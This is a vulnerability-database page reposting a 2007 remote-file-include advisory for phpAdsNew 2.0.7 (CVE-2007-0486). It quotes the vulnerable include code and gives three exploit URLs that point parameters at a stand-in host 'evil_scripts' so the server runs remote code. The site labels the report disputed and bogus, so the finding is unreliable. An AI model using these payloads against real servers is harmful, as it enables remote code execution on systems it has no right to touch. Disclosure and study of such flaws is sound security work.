WARNING! Fake news / Disputed / BOGUS

phpAdsNew 2.0.7 Remote File Include

2007.01.25
Credit: Alk()mand()z
Risk: Medium
Local: No
Remote: No
CVE: CVE-2007-0486
CWE: CWE-94


CVSS Base Score: 7.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

----------------------------------------------- phpAdsNew 2.0.7 Remote File Include ----------------------------------------------- Author: Alk()mand()z ----------------------------------------------- Vuln Code: include_once ($phpAds_geoPlugin); ....................... function phpAds_ReportGetPluginInfo($filename) { include ($filename); return ($plugin_info_function()); .......................... include ($phpAds_config['my_footer']); ----------------------------------------------- 3xplo!t: phpAdsNew-2.0.7/libraries/lib-remotehost.inc?phpAds_geoPlugin=http://evi l_scripts? phpAdsNew-2.0.7/admin/report-index?filename=http://evil_scripts? phpAdsNew-2.0.7/admin/lib-gui.inc?$phpAds_config['my_footer']=http://evi l_scripts? ----------------------------------------------- download: http://switch.dl.sourceforge.net/sourceforge/phpadsnew/phpAdsNew-2.0.7.z ip ----------------------------------------------- Greetz: KaBaRa, SpY0zErO, aG-SpIdEr - TOoOoFa -LoGiC-BoMb - MiRo-TiGeR SpeciaL GreeTz : AsB-MaY-GrOuPs & A-S-T -Team ################################################### AsB-MaT.NeT & D4eG.OrG ################################################### -- _______________________________________________ Get your free email from http://www.hackermail.com


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top